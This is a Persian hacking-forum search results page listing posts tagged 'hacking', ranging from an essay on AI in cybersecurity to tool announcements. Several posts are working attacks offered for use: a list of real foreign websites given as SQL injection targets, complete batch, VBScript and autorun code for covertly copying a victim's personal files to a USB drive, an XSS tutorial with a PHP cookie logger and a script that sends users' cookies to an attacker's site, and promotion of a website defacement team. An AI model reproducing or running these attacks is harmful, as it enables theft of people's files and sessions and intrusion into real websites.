رفتن به مطلب

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'hacking'.

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • اخبار هک و امنیت
    • انتقادات و پیشنهادات
    • بخش خصوصی
    • بخش ویژه - VIP
    • بخش زیر زمینی
  • سوال و جواب های عمومی
    • سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
    • سوال و جواب های امنیت سیستم های شخصی
    • سوال و جواب های برنامه نویسی
    • سوال و جواب های ابزارهای امنیتی
    • سوال و جواب های شبکه
    • سوال و جواب های مدیریت محتوا و وبلاگ ها
    • سوال و جواب های بخش Trojan , Rat , Keylogger
    • سوال و جواب های سیستم عامل ها
    • سوال و جواب های امنیت ایمیل های شخصی
    • سوال و جواب الکترونیک
    • سوال و جواب های موبایل
    • سوال و جواب های متفرقه
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • بخش کرک و رمزنگاری
    • ابزار کرک
    • مقالات و آموزشهای کرک
    • مقالات و آموزشهای رمزنگاری
    • ابزارهای رمزنگاری
    • پروکسی لیست
    • پسورد لیست و کمبو لیست
    • کانفیگ
    • اکانت های کرک شده
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
    • Cisco سیسکو
    • نتورک پلاس Netwok+
    • مایکروسافت Microsoft
    • میکروتیک Microtics
    • مجازی سازی
    • ابزارهای شبکه و مانیتورینگ
    • فایروال
  • سیستم عامل
    • لینوکس
    • ویندوز
    • کالی لینوکس Kali Linux
    • مکینتاش
  • الکترونيک و روباتيک
    • الکترونيک
    • ميکروکنترلرها و پروسسور ها
    • نرم افزار هاي تخصصي برق و الکترونيک
    • روباتيک
  • گرافيک
    • فتوشاپ
    • فلش
  • متفرقه
    • بحث آزاد

وبلاگ‌ها

چیزی برای نمایش وجود ندارد


جستجو در...

نمایش نتایجی که شامل...


تاریخ ایجاد

  • شروع

    پایان


آخرین بروزرسانی

  • شروع

    پایان


فیلتر بر اساس تعداد...

تاریخ عضویت

  • شروع

    پایان


گروه


About Me

22 نتیجه پیدا شد

  1. 🫠 دوستان درود و خسته نباشید به اعضای خفنه گارد ایران 🫡 امروز بعد از مدت های طولانی امدم با یه تاپیک جذاب! هوش مصنوعی! اما نه هوش مصنوعی تنها بلکه با علم هک و امنیت تو مرحله اول یه مقدماتی داریم اصلا برای آشنایی با هوش مصنوعی چون شاید خیلیا حتی آشنایی هم نداشته باشن 💤 مقدمه‌ای بر هوش مصنوعی در امنیت سایبری در دنیای دیجیتال امروزی، امنیت سایبری به یکی از دغدغه‌های اصلی افراد، سازمان‌ها و دولت‌ها تبدیل شده است. با افزایش پیچیدگی سیستم‌ها و تکنولوژی‌ها، حملات سایبری نیز روزبه‌روز پیچیده‌تر و هدفمندتر می‌شوند. در این میان، هوش مصنوعی (AI) به عنوان یک ابزار قدرتمند، در حال متحول کردن عرصه امنیت سایبری است. اما هوش مصنوعی دقیقا چه نقشی در امنیت سایبری دارد و چطور می‌تواند به ما در مقابله با تهدیدات سایبری کمک کند؟ هوش مصنوعی چیست؟ قبل از اینکه به کاربردهای هوش مصنوعی در امنیت سایبری بپردازیم، لازم است تعریف مختصری از خود هوش مصنوعی داشته باشیم. هوش مصنوعی به توانایی سیستم‌های کامپیوتری در انجام وظایفی گفته می‌شود که معمولاً نیازمند هوش انسانی هستند. این وظایف می‌توانند شامل یادگیری، استدلال، حل مسئله، درک زبان طبیعی و تشخیص الگو باشند. هوش مصنوعی به دو دسته کلی تقسیم می‌شود: هوش مصنوعی باریک (Narrow AI): این نوع هوش مصنوعی برای انجام یک کار خاص طراحی شده است. مثلاً یک سیستم تشخیص چهره یا یک سیستم بازی شطرنج. هوش مصنوعی عمومی (General AI): این نوع هوش مصنوعی هنوز وجود ندارد، اما به هوش مصنوعی‌ای گفته می‌شود که می‌تواند هر کاری را که یک انسان می‌تواند انجام دهد، انجام دهد. در امنیت سایبری، بیشتر از هوش مصنوعی باریک استفاده می‌شود که برای انجام وظایف خاصی مانند تشخیص نفوذ، شناسایی بدافزارها و پیش‌بینی حملات طراحی شده‌اند. کاربردهای هوش مصنوعی در امنیت سایبری: هوش مصنوعی می‌تواند در جنبه‌های مختلف امنیت سایبری به کار گرفته شود: ۱. شناسایی تهدیدات پیشرفته و ناشناخته (APT) هوش مصنوعی می‌تواند تهدیدات پیشرفته و پیچیده مانند حملات APT (Advanced Persistent Threats) را شبیه‌سازی و شناسایی کند. این نوع حملات معمولاً از روش‌های پیچیده و طولانی مدت برای نفوذ به سیستم‌ها استفاده می‌کنند و شناسایی آنها با روش‌های سنتی دشوار است. الگوریتم‌های یادگیری ماشین و شبکه‌های عصبی قادرند الگوهای نامتعارف در رفتار شبکه و سیستم‌ها را شبیه‌سازی و شناسایی کنند، حتی اگر این تهدیدات به صورت ناشناخته باشند. ۲. تشخیص حملات سایبری در زمان واقعی (Real-time Threat Detection) هوش مصنوعی می‌تواند حملات سایبری را در لحظه شبیه‌سازی کرده و تشخیص دهد. با استفاده از الگوریتم‌های یادگیری عمیق (Deep Learning) و تجزیه و تحلیل داده‌های ورودی، این سیستم‌ها قادرند به سرعت رفتارهای مشکوک را شناسایی کنند. به عنوان مثال، یک سیستم مبتنی بر AI می‌تواند ترافیک شبکه را تجزیه و تحلیل کرده و رفتارهای غیرعادی را که ممکن است نشان‌دهنده حملات DDoS (Distributed Denial-of-Service) یا بدافزار باشد، شناسایی کند. ۳. مقابله با حملات فیشینگ هوش مصنوعی می‌تواند به طور مؤثری حملات فیشینگ را شناسایی و مسدود کند. الگوریتم‌های یادگیری ماشین قادرند الگوهای ایمیل‌های فیشینگ را شبیه‌سازی کرده و از آن برای شناسایی پیام‌های جعلی استفاده کنند. این سیستم‌ها می‌توانند مشخصات پیام‌های مشکوک از جمله دامنه، زبان، ساختار ایمیل و لینک‌های موجود در آن را آنالیز کنند. ۴. شبیه‌سازی و پیش‌بینی حملات یکی از کاربردهای قدرتمند هوش مصنوعی، شبیه‌سازی حملات سایبری و پیش‌بینی حملات احتمالی در آینده است. با استفاده از مدل‌های پیش‌بینی و یادگیری ماشینی، می‌توان حملات سایبری آینده را شبیه‌سازی و برای مقابله با آن‌ها آمادگی بیشتری داشت. این شبیه‌سازی‌ها می‌توانند به سازمان‌ها کمک کنند تا نقاط ضعف خود را شناسایی و آنها را برطرف کنند. ۵. تحلیل رفتار کاربران (UEBA: User and Entity Behavior Analytics) هوش مصنوعی با استفاده از تحلیل رفتار کاربران (UEBA) می‌تواند الگوهای رفتاری کاربران و سیستم‌ها را در یک سازمان تحلیل کند. این تحلیل‌ها به سیستم‌ها کمک می‌کنند تا فعالیت‌های غیرمعمول کاربران یا موجودات دیگر را شبیه‌سازی و شناسایی کنند. به عنوان مثال، اگر یک کاربر به طور ناگهانی به فایل‌هایی که معمولاً به آنها دسترسی ندارد، دسترسی پیدا کند، سیستم مبتنی بر AI می‌تواند این رفتار را شناسایی و هشدار دهد. ۶. خودکارسازی پاسخ به حملات (SOAR: Security Orchestration, Automation, and Response) هوش مصنوعی می‌تواند به طور خودکار پاسخ به تهدیدات سایبری را مدیریت کند. سیستم‌های SOAR مبتنی بر AI قادرند پس از شناسایی یک تهدید، اقدامات خودکار برای مقابله با آن انجام دهند. به عنوان مثال، در صورت شناسایی یک حمله ویروسی یا بدافزار، سیستم می‌تواند اقداماتی مانند قطع دسترسی کاربر، قرنطینه کردن فایل‌های آلوده و حتی جلوگیری از دسترسی به سیستم را به طور خودکار انجام دهد. ۷. تشخیص نرم‌افزارهای مخرب و بدافزارها (Malware Detection) هوش مصنوعی در شناسایی و تجزیه و تحلیل بدافزارها بسیار مؤثر است. الگوریتم‌های یادگیری ماشین می‌توانند انواع مختلف بدافزارها از جمله ویروس‌ها، تروجان‌ها، و روتکیت‌ها را شبیه‌سازی و شناسایی کنند. این الگوریتم‌ها با تجزیه و تحلیل رفتار بدافزارها در سیستم‌های هدف می‌توانند آن‌ها را شناسایی کنند حتی اگر بدافزار به روزرسانی شده و یا از تکنیک‌های پنهان‌سازی (obfuscation) استفاده کند. ۸. حفاظت از داده‌ها و حریم خصوصی هوش مصنوعی می‌تواند برای حفاظت از داده‌ها و حریم خصوصی در برابر تهدیدات سایبری به کار رود. الگوریتم‌های AI قادرند به صورت اتوماتیک داده‌های حساس را شناسایی کنند و دسترسی به آن‌ها را محدود کنند. همچنین، تکنیک‌های رمزنگاری پیشرفته و تشخیص نشت اطلاعات (data leakage) با استفاده از هوش مصنوعی می‌توانند به جلوگیری از سرقت داده‌ها و نقض حریم خصوصی کمک کنند. ۹. مدیریت ریسک امنیتی و آسیب‌شناسی هوش مصنوعی می‌تواند در ارزیابی و مدیریت ریسک‌های امنیتی نقش داشته باشد. سیستم‌های مبتنی بر AI می‌توانند آسیب‌شناسی دقیق از تهدیدات امنیتی در سازمان‌ها ارائه دهند و کمک کنند تا با توجه به اولویت‌بندی تهدیدات، اقدامات پیشگیرانه به موقع انجام شود. این تحلیل‌ها می‌توانند شامل شبیه‌سازی تهدیدات، ارزیابی آسیب‌پذیری‌های سیستم و حتی تعیین هزینه‌های احتمالی حملات سایبری باشند. ۱۰. تکنیک‌های یادگیری فدرال (Federated Learning) در زمینه امنیت سایبری، یادگیری فدرال به عنوان روشی برای آموزش مدل‌های هوش مصنوعی بدون نیاز به جمع‌آوری داده‌های حساس در یک مکان واحد مورد استفاده قرار می‌گیرد. این تکنیک در حفاظت از حریم خصوصی و کاهش خطرات مرتبط با ذخیره‌سازی داده‌ها در یک سرور مرکزی مفید است، زیرا مدل‌های هوش مصنوعی به صورت توزیع‌شده در دستگاه‌ها یا سرورهای مختلف آموزش می‌بینند. چالش‌های استفاده از هوش مصنوعی در امنیت سایبری: با وجود مزایای فراوان، استفاده از هوش مصنوعی در امنیت سایبری با چالش‌هایی نیز همراه است: هزینه بالا: پیاده‌سازی سیستم‌های امنیتی مبتنی بر هوش مصنوعی می‌تواند هزینه بالایی داشته باشد. نیاز به داده‌های عظیم: الگوریتم‌های یادگیری ماشینی برای آموزش به داده‌های عظیم نیاز دارند. جمع‌آوری و آماده‌سازی این داده‌ها می‌تواند چالش‌برانگیز باشد. خطای انسانی: سیستم‌های مبتنی بر هوش مصنوعی نیز می‌توانند دچار خطا شوند. خطای انسانی در طراحی، پیاده‌سازی و نگهداری این سیستم‌ها می‌تواند عواقب جدی داشته باشد. حمله به خود سیستم‌های هوش مصنوعی: هکرها می‌توانند با روش‌های خاصی سیستم‌های هوش مصنوعی را فریب دهند یا آنها را از کار بیاندازند (Adversarial Attacks). هوش مصنوعی چگونه به ما در مبارزه با تهدیدات سایبری کمک می‌کند؟ ۱. شناسایی و پیش‌بینی تهدیدات هوش مصنوعی، به ویژه الگوریتم‌های یادگیری ماشین، قادرند رفتار سیستم‌ها و شبکه‌ها را در زمان واقعی تجزیه و تحلیل کرده و الگوهای غیرعادی را شبیه‌سازی و شناسایی کنند. این قابلیت به ویژه در شناسایی تهدیدات ناشناخته و پیچیده که هنوز به طور رسمی شناسایی نشده‌اند، اهمیت دارد. به طور خاص، در برابر حملات APT (Advanced Persistent Threats) که مدت زمان طولانی به طور مخفیانه در سیستم‌ها باقی می‌مانند، هوش مصنوعی می‌تواند الگوهای رفتاری مشکوک را شبیه‌سازی و شناسایی کند، حتی اگر این تهدیدات جدید یا ناشناخته باشند. کاربردها: تشخیص رفتارهای غیرعادی: با استفاده از تکنیک‌های یادگیری ماشین مانند ماشین‌های بردار پشتیبان (SVM) یا شبکه‌های عصبی عمیق (DNN)، هوش مصنوعی قادر است رفتارهای غیرعادی در شبکه‌ها و سیستم‌ها را شبیه‌سازی کرده و حملات سایبری مانند دسترسی غیرمجاز به داده‌ها، افزایش ناگهانی ترافیک یا دسترسی‌های نامتعارف به منابع را شناسایی کند. پیش‌بینی تهدیدات: هوش مصنوعی می‌تواند با تحلیل داده‌های تاریخی حملات و رفتارهای گذشته، تهدیدات احتمالی را پیش‌بینی کرده و به تیم‌های امنیتی هشدار دهد تا اقدامات پیشگیرانه انجام دهند. ۲. خودکارسازی واکنش‌ها و پاسخ به تهدیدات یکی از چالش‌های اصلی در مبارزه با تهدیدات سایبری، واکنش سریع و مؤثر به حملات است. با افزایش حجم حملات و پیچیدگی آن‌ها، انسان‌ها نمی‌توانند همیشه به سرعت واکنش نشان دهند. هوش مصنوعی با خودکارسازی پاسخ‌ها به تهدیدات می‌تواند زمان واکنش را به حداقل برساند. کاربردها: پاسخ خودکار به حملات: سیستم‌های هوش مصنوعی می‌توانند پس از شناسایی حملات، به طور خودکار اقدامات اصلاحی مانند بلاک کردن IPهای مشکوک، قطع دسترسی کاربران مخرب، قرنطینه کردن فایل‌های آلوده یا حتی رفع آسیب‌های امنیتی را انجام دهند. سفارشی‌سازی واکنش‌ها: این سیستم‌ها قادرند براساس نوع تهدید و شدت آن، واکنش‌های مختلفی را طراحی و اجرا کنند. برای مثال، حملات DDoS (توزیع‌شده انکار سرویس) می‌تواند با کاهش حجم ترافیک یا تغییر مسیر آن، به سرعت محدود شود. ۳. تشخیص حملات فیشینگ حملات فیشینگ، به عنوان یکی از رایج‌ترین انواع حملات سایبری، به استفاده از ایمیل‌ها یا پیام‌های جعلی برای سرقت اطلاعات حساس مانند پسورد و اطلاعات بانکی اشاره دارد. هوش مصنوعی می‌تواند این حملات را از طریق تجزیه و تحلیل رفتار و ویژگی‌های پیام‌ها شناسایی کند. کاربردها: تشخیص ایمیل‌های فیشینگ: الگوریتم‌های یادگیری ماشین می‌توانند ویژگی‌های ایمیل‌های فیشینگ از جمله دامنه‌های مشکوک، زبان و محتوای غیرطبیعی، و لینک‌های هدایت‌کننده به صفحات جعلی را شبیه‌سازی و شناسایی کنند. یادگیری مستمر: مدل‌های هوش مصنوعی با توجه به تعاملات جدید کاربران و روش‌های نوین حمله، قادر به یادگیری و به روزرسانی الگوریتم‌ها هستند تا تهدیدات فیشینگ جدید را شناسایی کنند. ۴. مقابله با بدافزارها و نرم‌افزارهای مخرب هوش مصنوعی می‌تواند در شناسایی و مقابله با بدافزارها و نرم‌افزارهای مخرب بسیار مؤثر باشد. با استفاده از الگوریتم‌های یادگیری ماشین، این سیستم‌ها می‌توانند حتی بدافزارهایی را که از تکنیک‌های پیشرفته برای مخفی شدن استفاده می‌کنند، شناسایی کنند. کاربردها: تشخیص بدافزارهای ناشناخته: الگوریتم‌های یادگیری ماشین می‌توانند رفتارهای غیرمعمول نرم‌افزارها را شبیه‌سازی و تشخیص دهند. این الگوریتم‌ها قادرند بدافزارهایی که به روش‌های جدید، مانند پنهان‌سازی کد یا رمزگذاری فایل‌ها عمل می‌کنند، شناسایی کنند. جلوگیری از انتشار بدافزار: پس از شناسایی بدافزار، سیستم‌های هوش مصنوعی می‌توانند به طور خودکار اقدامات پیشگیرانه انجام دهند، مانند قرنطینه کردن سیستم‌های آلوده یا قطع ارتباط با سرورهای کنترل. ۵. تحلیل و شبیه‌سازی حملات (Red Teaming) یکی از توانمندی‌های دیگر هوش مصنوعی، شبیه‌سازی حملات سایبری از دیدگاه یک مهاجم است. این نوع شبیه‌سازی به Red Teaming معروف است، که در آن سیستم‌های AI به شبیه‌سازی حملات واقعی به شبکه‌ها و سیستم‌های شرکت‌ها پرداخته و نقاط ضعف آن‌ها را شناسایی می‌کند. کاربردها: شبیه‌سازی حملات سایبری: الگوریتم‌های هوش مصنوعی می‌توانند حملات متنوعی را از جمله حملات DDoS، SQL Injection یا Cross-Site Scripting (XSS) شبیه‌سازی کنند و ارزیابی دقیقی از امنیت سیستم‌ها و شبکه‌ها ارائه دهند. شناسایی آسیب‌پذیری‌ها: پس از شبیه‌سازی حملات، سیستم‌های هوش مصنوعی قادرند آسیب‌پذیری‌ها و نقاط ضعف موجود در سیستم‌ها را شناسایی و به تیم‌های امنیتی گزارش دهند. ۶. آموزش و آگاهی‌بخشی (Security Awareness Training) هوش مصنوعی می‌تواند به سازمان‌ها کمک کند تا کارکنان خود را در برابر تهدیدات سایبری آگاه کنند. سیستم‌های AI می‌توانند از طریق شبیه‌سازی حملات فیشینگ و ارائه تمرینات عملی، مهارت‌های شناسایی تهدیدات را در کاربران تقویت کنند. کاربردها: تمرینات شبیه‌سازی فیشینگ: سیستم‌های هوش مصنوعی می‌توانند حملات فیشینگ شبیه‌سازی‌شده را برای کاربران ارسال کنند و از این طریق نقاط ضعف در آگاهی‌های امنیتی کاربران را شناسایی و برطرف کنند. آموزش داینامیک: این سیستم‌ها می‌توانند بسته به رفتارهای کاربران، برنامه‌های آموزشی دینامیک و به‌روز را برای آن‌ها طراحی کنند. ۷. مدیریت ریسک و ارزیابی آسیب‌پذیری هوش مصنوعی می‌تواند در ارزیابی آسیب‌پذیری‌های امنیتی و ارزیابی ریسک‌ها در سازمان‌ها کمک کند. این سیستم‌ها می‌توانند با استفاده از داده‌های واقعی و تحلیل‌های آماری، میزان آسیب‌پذیری سیستم‌ها و خطرات مربوط به آن‌ها را پیش‌بینی کنند. کاربردها: شبیه‌سازی تهدیدات: سیستم‌های AI می‌توانند تهدیدات مختلف را شبیه‌سازی کرده و نقاط ضعف موجود در سیستم‌ها را شناسایی کنند. اولویت‌بندی اقدامات امنیتی: با استفاده از تحلیل داده‌ها، سیستم‌های هوش مصنوعی می‌توانند اولویت‌بندی دقیقی از تهدیدات ایجاد کرده و کمک کنند تا منابع امنیتی به طور مؤثر و با دقت بیشتری تخصیص یابند. نتیجه‌گیری: هوش مصنوعی به عنوان یک ابزار قدرتمند، در حال متحول کردن عرصه امنیت سایبری است. با وجود چالش‌ها، کاربرد هوش مصنوعی در امنیت سایبری روزبه‌روز در حال گسترش است و آینده امنیت سایبری بدون استفاده از هوش مصنوعی قابل تصور نیست. درک این موضوع و آگاهی از کاربردها و چالش‌های آن برای هر کسی که در این حوزه فعالیت می‌کند یا به آن علاقه‌مند است، بسیار ضروری است. این از پارت اول که صرفا یک آشنایی با هوش مصنوعی و نقش اون تو دنیای هکینگ پیدا کردید دقت کنید بچه ها تو این تاپیک حتی آموزش و محتوای ویدیویی و عملی هم داریم :)) پس ممنون میشم از همین الان خودتون رو به مخاطب های این تاپیک اضافه کنید تا واقعا چند تا چیز درست یاد بگیریم همه هچنین با خیال راحت از طریق پیام و یا شبکه های اجتماعی انتقاد و پیشنهاد هاتون رو میتونید منتقل کنید و ممنون میشم که روی این تاپیک چیزی ریپلای نکنید 💜
  2. C0d3!Nj3ct!0n

    تارگت های Sql Injection

    برای تمرین باگ Sql Injection و برای اینکه کلی وقتتون جهت پیدا کردن باگ آسیب پذیر گرفته نشه در هر بخش چندین تارگت برای تمرین و نفوذ و هک سایت با باگ Sql Injection ( Hacking Web Application Sql Injection ) را برای شما قرار میدم . اسپم ندین و سوالات رو تنها در این بخش مطرح کنید . مجددا تکرار می کنم از قرار دادن سایتهای ایرانی خودداری فرمایید www.c2-europe.eu/news-full.php?id=1049 www.c2-deutschland.de/news-full.php?id=287 www.p5n.net/mtl/news-full.php?id=14 [Hidden Content] موفق باشین
  3. Loki303

    WOHIS

    ابزار هوییز سایت و بررسی اطلاعات سایت برای لینوکس و ترموکس [Hidden Content] زبان : python3 پلتفورم : linux , termux
  4. Zed

    دوره جامعه nmap

    سلام دوستان در این تاپیک می خوایم آموزش کار با ابزار قدرتمند NMAP رو بزاریم من داخل سایت گشتم اما آموزش کامل رو پیدا نکردم اگر هم بود من ندید از حاشیه های که بگذریم از همین امروز دوره ما شروع میشه من سعی می کنم هر روز دوره رو پیش ببرم تا تمام مباحث این اسکنر قویی رو باهم به خوبی درک و فرا بگیریم این تاپیک بیشتر تاپیک معرفی هست قسمت اول آموزش فردا روی سایت قرار میگره قسمت اول آشنایی با ابزار و آموزش نصب
  5. یکی از پر چالش ترین موضوعات برای یک هکر انتخاب سیستم عامل هست البته در حال حاضر یک تاز میدان Kali Linux هست که واقعا هم سیستم عامل قدرتمندی هست اما امروز اومدم ی سیستم عامل بهتون معرفی کنم کار کردن باهاش برای مبتدی ها هم آسون تر هست هم ابزار های بیشتری داره از همه مهم تر ساخت ایران هستش که خیلی خوب هست البته نیومد یک طرفه به قاضی برم و همش بزنم تو سر لینوکس بله ترمینال لینوکس خیلی خیلی قدرتمند و سریع هستش اما ویندوز هم خوبی های خودش رو داره امروز اومدم با معرفی سیستم عامل black win که سیستم عامل بسیار خوبی هست و تحت ویندوز هستش خب رو ویندوز فوت شاپ نصب میشه گیم نصب میشه کلا هر کاری دوست داری کن ولی لینوکس دهنت سرویس میشه بخوای رو کالی گیم نصب کنی ! در نهایت هم همچیز بستگی به خودم ادم داره که کدوم رو انتخاب می کنه اما پیشنهاد من به شما بلک وین هست تا تاپیک بعدی 👋
  6. Sadra

    Guardiran Explpot Database

    با سلام خدمت دوستان عزیز شاید قبلا Guardiran Exploit Database رو جز خدمات Mr.MSA دیده باشید: اما از الان به بعد برای این پروژه یک دامین جدید گرفتم و به پروژه جدا تبدیل شد: exploit-db.ga نکات مهم درمورد این سیستم: ۱- این سیستم کلا از خدمات MR.MSA جدا میشه ولی از طرفی یکی از خدمات و پروژه های من هست! ۲- دامین تا یک سال تمدیده. ۳- پروژه که php بود رو html کردم. ۴- سورس در گیتهاب موجود میباشد. ۵- اکسپلویت های بخش vip انجمن قرار داره. لینک گیت هاب موفق و پایدار باشید.
  7. Sadra

    نظر سنجی کشف آسیب پذیری

    لطفا در نظر سنجی قرار دادن ویدئوی تست و نفوذ وبسایت ها و کشف باگ که بیشتر سایت ها هست شرکت کنید.
  8. سلام دوستان. در این تاپیک می خوام نحوه ساخت ویروسی برای کپی اطلاعات به صورت فیزیکی اون هم بدون اطلاع تارگت را قرار بدم. (شاید تو خیلی فیلم ها دیده باشید) برای انجام تمیز و کامل شما نیاز به چهار فایل دارید(فقط یکی از فایل ها ضروری است و بقیه فایل ها برای به جا نگذاشتن رد است) به علت خطرناک نبودن فایل ها برای سیستم، آنتی ویروس ها کاری به فایل های ما ندارن. ساخت فایل اصلی برای ساخت ویروس می توانید از یک تکست ادیتور ساده مثل Notepad استفاده کنید، کد زیر را داخل یک فایل bat قرار دهید و نام آن را file.bat بگذارید (حتما فایل را با فرمت .bat ذخیره کنید.) :: variables /min SET odrive=%odrive:~0,2% set backupcmd=xcopy /s /c /d /e /h /i /r /y /g echo off %backupcmd% "%USERPROFILE%\Desktop" "%drive%\SRX\Desktop" %backupcmd% "%USERPROFILE%\pictures" "%drive%\SRX\My pics" %backupcmd% "%USERPROFILE%\Documents" "%drive%\SRX\Documents" %backupcmd% "%USERPROFILE%\Favorites" "%drive%\SRX\Favorites" %backupcmd% "%USERPROFILE%\videos" "%drive%\SRX\vids" %backupcmd% "%USERPROFILE%\Download" "%drive%\SRX\Download" %backupcmd% "%USERPROFILE%\Music" "%drive%\SRX\Music" %backupcmd% "%USERPROFILE%\OneDrive" "%drive%\SRX\OneDrive" %backupcmd% "%USERPROFILE%\3D Objects" "%drive%\SRX\3D Objects" %backupcmd% "%USERPROFILE%\Contacts" "%drive%\SRX\Contacts" @echo off مخفی سازی هنگام اجرا برای مخفی کردن فایل هنگام اجرا نیاز به دو فایل دارید. فایل اول دوباره Notepad را باز کنید و فایلی با عنوان invisible.vbs بسازید و کد زیرا داخل آن قرار دهید. (حتما فایل را با فرمت .vbs -مخفف وی‌بی‌اسکریپت- ذخیره کنید) CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False فایل دوم مجددا Notepad را باز کنید و یک فایل .bat دیگر بسازید و کد زیر را درونش قرار دهید. می توانید نام فایل را launcher.bat بگذارید. wscript.exe "%drive%\invisible.vbs" "%drive%\file.bat" نکته: یک فایل دیگر هم هست که فقط زمانی کاربرد که ویندوز تارگت شما 7 یا کمتر از 7 باشد.البته بهتر است این فایل هم کنار فایل هایتان داشته باشید چون اگر اجرا شود خیلی می تواند در روند کار به شما کمک کند. در غیر این صورت شما نیازمند این فایل نیستید و می توانید از آن صرف نظر کنید. استفاده از Autorun Notepad را باز کنید و فایلی با عنوان autorun.inf درست کنید و کد زیر را درونش قرار دهید. [autorun] open=launcher.bat تمام فایل ها را درون هارد یا فلشتون منتقل کنید (ترجیحا از چیزی با حافظه ذخیره سازی بالا مثل هارد استفاده کنید تا مشکل کمبود فضا نداشته باشید) اگر تارگت شما از ویندوز 7 به پایین استفاده می کرد شما فقط باید هارد یا فلشتون رو به سیستم متصل کنید. اما اگر تارگت از ویندوز 8 ، 8.1 یا 10 استفاده می کرد باید خیلی سریع و به صورت مخفیانه فایل launcher.bat رو اجرا کنید. (می توانید از مهندسی اجتماعی برای انجام کار استفاده کنید) اطلاعاتی که کپی می شود را می توانید به محض اجرای فایل در پوشه ای با نام SRX مشاهده کنید. امیدوارم که استفاده کافی رو برده باشد🌹
  9. nonamee

    Bot For Game

    ••.•´¯`•.•• 🎀 به نام خدا 🎀 ••.•`¯´•.•• با سلام خدمت شما کاربران محترم تیم انجمن گاردایران در این تاپیک یک ویدئو از باتی که برای گیم پلی 𝐢𝐧𝐯𝐨𝐤𝐞𝐫 قرار دادم دوتا بازا میدونن کار با این هیرو چقدر سخت هستش و برای انجام شدن یک اسپل چند کلید رو باید باهم بزنید نحوه ی عملکرد بات رو به صورت ویدئو قرار خواهم داد برای آموزش اختصاصی ویروس نویسی با من در ارتباط باشید از دادن اسپم در این تاپیک خودداری کنید Untitled.mp4
  10. Sadra

    ابزار های دیفیس گاردایران

    با سلام خدمت تمامی اساتید انجمن تیم امنیتی گاردایران . این تاپیک برای ارائه ابزار های نوشته شده توسط کاربران دیفیسر گاردایران در سرور دیسکورد هست . که بیشتر ابزار ها رو خودم تاپیکش رو می زارم مگر اینکه نویسنده ابزار موافق نباشد . اعضای دیفیسر (غیر رسمی ) : 1- @proxy 2- @MR.MSA 3- @Dr.Kali 4- @HCSH4C39 5- @mmj-sys 6- @KR0N0S 7- @SHIWPTS13 8- @Scary مشارکت در تیم دیفیس : شما با هر سطح علمی در زمینه هک ، کم(صفر) ، متوسط و حرفه ای می توانید در تیم دیفیس شرکت کنید . برای مشارکت و آموزش و شروع به دیفیس به سرور دیسکورد گاردایران مراجعه کنید . لینک های مهم : سرور دیسکورد گاردایران دیفیسر ها سایت های هک شده توسط تیم امنیتی گاردایران موفق و پیروز باشید .
  11. Sadra

    آموزش باگ xss

    با سلام خدمت شما دوستان عزیز یکی از دوستان آموزش باگ xss رو درخواست داشت که قرار دادم . Cross Site Scripting روش کار :‌ با دستورات javascript شما رو به یه لینک ریدایرکت می کنه و کوکی های کاربران رو به شما میده . خب حالا بریم سراغ کارمون .(فقط روی سایت هایی که باگ xss دارند میشه ) مرحله ۱ :‌ برای مثال یه چت روم هست که پیام میدید شما توش به جای پیام این متن رو ارسال میکنید :‌ <script>alert('Error')</script> اگر زمان واردشدن در صفحه در قالب خطا به شما error رو نمایش داد (به صورت هشدار مثلا) یعنی سایت باگ رو داره . مرحله ۲ : در یک سایت که مال خودتون هست یک فایل به نام xss.php درست کنید و این کد php رو درش قرار دهید : <?php $cookie=$_GET['c']; $fo=fopen('cookie.html','a'); fwrite($fo,'Cookie:'.$cookie.'<br><br><br>---------------------------------------<br><br><br>'); fclose($fo); ?> مرحله ۳ : در قسمت ارسال پیام یک پیام دیگر ارسال کنید دارای این کد javascript : <script>document.location="[Hidden Content]=" + document.cookie </script> یا <script>document.location="[Hidden Content]="%2bdocument.cookie </script> به جای site.com ادرس سایت خودتون رو بدید که فایل xss.php رو درش گذاشتید . مرحله ۴ : وارد این ادرس شوید : [Hidden Content] و زمانی که کاربران اون پیام شما رو می بینند ریدایرکت میشن به این ادرس site.com/xss.php و کوکی های اونا توی فایلی به اسم cookie.html برای شما زخیره می شود . نکات مهم زمان انجام این عمل : ۱- هیچ وقت روی سایت خودتون فایل ها رو نسازید چون اگر یه نفر متوجه بشه از سایتتون شکایت میکنه و.... ۲- روی سایت های ایرانی هیچ وقت انجام ندید . ۳- این باگ در جاهای مختلف سایت می تونه باشه مثل باکس جست و جو و بخش نظرات و... ۴- روش های خیلی زیادی برای استفاده از این باگ وجود دارد . اختصاصی Mr.MSA لایک فراموش نشه ! موفق و پیروز باشید .
  12. Sadra

    Mr.Hasher Tool

